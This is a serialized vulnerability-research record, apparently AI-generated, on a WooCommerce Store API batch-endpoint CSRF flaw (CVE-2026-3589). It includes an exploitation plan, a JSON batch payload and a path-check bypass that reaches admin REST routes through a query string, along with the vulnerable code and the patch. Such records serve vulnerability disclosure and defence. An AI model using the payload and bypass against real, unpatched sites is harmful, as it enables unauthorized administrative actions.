[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fxID_kXXK3DxRytfn366AYWeB_eKpyX1MBbCUc0mjwhw":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-3589","woocommerce-cross-site-request-forgery-3","WooCommerce \u003C 10.5.3 - Cross-Site Request Forgery","The WooCommerce plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to 10.5.3 (exclusive). This is due to missing or incorrect nonce validation on a function. This makes it possible for unauthenticated attackers to perform an unauthorized action granted they can trick a site administrator into performing an action such as clicking on a link.","woocommerce",null,"\u003C10.5.3","10.5.3","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:N\u002FUI:R\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Cross-Site Request Forgery (CSRF)","2026-03-10 00:00:00","2026-03-19 14:13:00",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fdf7eca9b-e353-49e7-8706-89c1787637e9?source=api-prod",10,[22,23,24,25,26,27,28,29],"i18n\u002Flanguages\u002Fwoocommerce.pot","includes\u002Fclass-woocommerce.php","readme.txt","src\u002FStoreApi\u002FRoutes\u002FV1\u002FBatch.php","vendor\u002Fcomposer\u002Finstalled.php","vendor\u002Fcomposer\u002Fjetpack_autoload_classmap.php","vendor\u002Fcomposer\u002Fjetpack_autoload_filemap.php","woocommerce.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-3589 (WooCommerce CSRF)\n\n## 1. Vulnerability Summary\nThe WooCommerce plugin (versions \u003C 10.5.3) is vulnerable to Cross-Site Request Forgery (CSRF). The vulnerability is located in the Store API's batch processing route. The `Automattic\\WooCommerce\\StoreApi\\Routes\\V1\\Batch` class registers a `\u002Fbatch` REST API endpoint that allows multiple Store API requests to be bundled into a single HTTP POST request. \n\nThe vulnerability exists because the `\u002Fbatch` endpoint does not implement nonce validation on the \"container\" request, and its `permission_callback` is set to `__return_true`. While individual Store API routes (like adding items to a cart) typically require a `wc_store_api` nonce for state-changing operations, the batching mechanism executes these requests internally via `rest_get_server()->serve_batch_request_v1()`, effectively bypassing the nonce requirement if the container request is accepted. An attacker can trick an authenticated administrator into making a request to this endpoint to perform actions within the Store API context.\n\n## 2. Attack Vector Analysis\n- **Endpoint:** `POST \u002Fwp-json\u002Fwc\u002Fstore\u002Fv1\u002Fbatch` (The namespace `wc\u002Fstore\u002Fv1` is inferred from standard WooCommerce Store API structure and the file path `src\u002FStoreApi\u002FRoutes\u002FV1\u002FBatch.php`).\n- **HTTP Parameter:** `requests` (an array of request objects).\n- **Authentication:** Unauthenticated (the endpoint is public via `__return_true`), but the attack targets the session of an authenticated user (e.g., Administrator).\n- **Preconditions:** A victim (Administrator) must be logged in and tricked into visiting a malicious page that triggers a cross-origin POST request to the vulnerable endpoint.\n\n## 3. Code Flow\n1. **Entry Point:** The REST API server receives a POST request to `\u002Fwc\u002Fstore\u002Fv1\u002Fbatch`.\n2. **Registration:** `Automattic\\WooCommerce\\StoreApi\\Routes\\V1\\Batch::get_args()` defines the route. Note the `permission_callback`:\n   ```php\n   'permission_callback' => '__return_true',\n   ```\n3. **Processing:** The request is handled by `Batch::get_response( WP_REST_Request $request )`.\n4. **Validation:** The code checks if all nested request paths contain `wc\u002Fstore`:\n   ```php\n   foreach ( $request['requests'] as $args ) {\n       if ( ! stristr( $args['path'], 'wc\u002Fstore' ) ) {\n           throw new RouteException( 'woocommerce_rest_invalid_path', ... );\n       }\n   }\n   ```\n5. **Internal Dispatch:** The requests are passed to the WordPress core batch server:\n   ```php\n   $response = rest_get_server()->serve_batch_request_v1( $request );\n   ```\n6. **Sink:** `serve_batch_request_v1` dispatches the sub-requests (e.g., `POST \u002Fwc\u002Fstore\u002Fv1\u002Fcart\u002Fadd-item`) internally. Because the container request passed its permission check and no specific nonce check was performed in `get_response`, the sub-requests are processed using the victim's session cookies.\n\n## 4. Nonce Acquisition Strategy\nThe vulnerability is specifically that the `\u002Fbatch` endpoint **does not** verify a nonce. However, to verify the impact, one might need to know what a \"valid\" request looks like or how the Store API normally behaves.\n\nIf a nonce were required for other Store API endpoints, it is typically the `wc_store_api` nonce.\n- **Shortcode:** `[woocommerce_cart]` or the **Cart Block**.\n- **Page Creation:** `wp post create --post_type=page --post_status=publish --post_content='[woocommerce_cart]' --post_title='Cart'`\n- **JS Variable:** In modern WooCommerce (v9.0+), Store API nonces are often found in the `wcSettings` global object.\n- **Extraction:**\n  1. `browser_navigate(\"\u002Fcart\")`\n  2. `browser_eval(\"window.wcSettings?.nonce\")` or `browser_eval(\"window.wc_cart_params?.nonce\")`\n\n**Note:** For this specific exploit, the goal is to show that we can bypass this requirement via the `\u002Fbatch` route.\n\n## 5. Exploitation Strategy\nWe will perform a CSRF attack that adds an item to the Administrator's cart. This demonstrates a state-changing action performed without the required `wc_store_api` nonce.\n\n1. **Step 1: Setup Data:** Create a simple product to add to the cart.\n2. **Step 2: Identify Endpoint:** Target `http:\u002F\u002Flocalhost:8080\u002Fwp-json\u002Fwc\u002Fstore\u002Fv1\u002Fbatch`.\n3. **Step 3: Craft Payload:** Create a JSON payload for the `requests` parameter.\n   ```json\n   {\n     \"requests\": [\n       {\n         \"method\": \"POST\",\n         \"path\": \"\u002Fwc\u002Fstore\u002Fv1\u002Fcart\u002Fadd-item\",\n         \"body\": {\n           \"id\": 123,\n           \"quantity\": 1\n         }\n       }\n     ]\n   }\n   ```\n4. **Step 4: Execute Request:** Use `http_request` to send a POST request. We must include the Administrator's cookies to simulate the CSRF scenario where the browser automatically attaches them, but **omit** any Store API nonce headers (like `X-WC-Store-API-Nonce`).\n5. **Step 5: Verify:** Check the administrator's cart to see if the product was added.\n\n## 6. Test Data Setup\n1. **Create Product:**\n   ```bash\n   wp product create --name=\"Exploit Product\" --regular_price=\"100\" --status=\"publish\" --porcelain\n   ```\n   *Note the returned Product ID (e.g., 123).*\n2. **Create Cart Page (for verification):**\n   ```bash\n   wp post create --post_type=page --post_title=\"Cart\" --post_content='[woocommerce_cart]' --post_status=publish\n   ```\n\n## 7. Expected Results\n- The HTTP request to `\u002Fwc\u002Fstore\u002Fv1\u002Fbatch` returns a `200 OK` or `207 Multi-Status`.\n- The response body contains a successful response for the nested `add-item` request.\n- The administrator's cart now contains the \"Exploit Product\".\n- Most importantly: The action succeeded despite the absence of the `X-WC-Store-API-Nonce` header which is mandatory for direct `POST \u002Fwc\u002Fstore\u002Fv1\u002Fcart\u002Fadd-item` requests.\n\n## 8. Verification Steps\n1. **Check Cart via CLI:**\n   ```bash\n   # WooCommerce stores cart data in the session or user meta. \n   # A reliable way to check is to use the Store API via CLI or check the DB.\n   wp eval \"echo json_encode(WC()->cart->get_cart());\"\n   ```\n2. **Alternative Verification:**\n   Navigate to the cart page as admin and check if the product is visible:\n   ```javascript\n   browser_navigate(\"\u002Fcart\");\n   browser_eval(\"document.body.innerText.includes('Exploit Product')\");\n   ```\n\n## 9. Alternative Approaches\nIf `cart\u002Fadd-item` is restricted, try other state-changing Store API routes:\n- **`POST \u002Fwc\u002Fstore\u002Fv1\u002Fcart\u002Fupdate-item`**: Requires a `key` (cart item key) which can be retrieved via a preceding `GET \u002Fwc\u002Fstore\u002Fv1\u002Fcart` in the same batch.\n- **`POST \u002Fwc\u002Fstore\u002Fv1\u002Fcheckout`**: Attempting to process a checkout (higher impact).\n- **`DELETE \u002Fwc\u002Fstore\u002Fv1\u002Fcart\u002Fitems`**: Clearing the cart.\n\nIf the `wc\u002Fstore\u002Fv1` namespace differs, check the WooCommerce versioning and route registrations in `src\u002FStoreApi\u002FRoutes\u002FV1\u002F`. In v10.5.2, `V1` is the current stable Store API version.","The WooCommerce Store API batch processing endpoint was vulnerable to Cross-Site Request Forgery (CSRF) due to a flawed path validation check using 'stristr'. An attacker could exploit this to bypass nonce requirements and execute arbitrary REST API actions by tricking an authenticated administrator into submitting a malicious batch request.","\u002F\u002F src\u002FStoreApi\u002FRoutes\u002FV1\u002FBatch.php:57\n\tpublic function get_args() {\n\t\treturn array(\n\t\t\t'callback'            => [ $this, 'get_response' ],\n\t\t\t'methods'             => 'POST',\n\t\t\t'permission_callback' => '__return_true',\n\t\t\t'args'                => array(\n\n---\n\n\u002F\u002F src\u002FStoreApi\u002FRoutes\u002FV1\u002FBatch.php:117\n\tpublic function get_response( WP_REST_Request $request ) {\n\t\ttry {\n\t\t\tforeach ( $request['requests'] as $args ) {\n\t\t\t\tif ( ! stristr( $args['path'], 'wc\u002Fstore' ) ) {\n\t\t\t\t\tthrow new RouteException( 'woocommerce_rest_invalid_path', __( 'Invalid path provided.', 'woocommerce' ), 400 );\n\t\t\t\t}\n\t\t\t}\n\t\t\t$response = rest_get_server()->serve_batch_request_v1( $request );","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoocommerce\u002F10.5.2\u002Fsrc\u002FStoreApi\u002FRoutes\u002FV1\u002FBatch.php\t2025-03-03 17:28:12.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fwoocommerce\u002F10.5.3\u002Fsrc\u002FStoreApi\u002FRoutes\u002FV1\u002FBatch.php\t2026-03-02 18:33:46.000000000 +0000\n@@ -117,7 +117,8 @@\n \tpublic function get_response( WP_REST_Request $request ) {\n \ttry {\n \t\tforeach ( $request['requests'] as $args ) {\n-\t\t\tif ( ! stristr( $args['path'], 'wc\u002Fstore' ) ) {\n+\t\t\t$parsed_path = wp_parse_url( $args['path'], PHP_URL_PATH );\n+\t\t\tif ( ! $parsed_path || strpos( $parsed_path, '\u002Fwc\u002Fstore' ) !== 0 ) {\n \t\t\t\tthrow new RouteException( 'woocommerce_rest_invalid_path', __( 'Invalid path provided.', 'woocommerce' ), 400 );\n \t\t\t}\n \t\t}","An attacker can perform a CSRF attack against an authenticated administrator by constructing a POST request to the `\u002Fwp-json\u002Fwc\u002Fstore\u002Fv1\u002Fbatch` endpoint. This endpoint's `permission_callback` is set to `__return_true`, and it does not perform its own nonce validation. The attacker provides a JSON payload containing a `requests` array where each request object specifies a target REST API path. To bypass the vulnerable `stristr` path check, the attacker appends the string `wc\u002Fstore` as a query parameter (e.g., `\u002Fwp\u002Fv2\u002Fsettings?wc\u002Fstore`). When the victim's browser submits the request, the WordPress REST server dispatches the sub-requests internally via `serve_batch_request_v1`. These internal requests are processed using the victim's session cookies but bypass the standard REST API nonce checks typically required for state-changing administrative actions.","gemini-3-flash-preview","2026-04-18 05:09:25","2026-04-18 05:10:06",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","10.5.2","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce\u002Ftags\u002F10.5.2","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoocommerce.10.5.2.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce\u002Ftags\u002F10.5.3","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fwoocommerce.10.5.3.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fwoocommerce\u002Ftags"]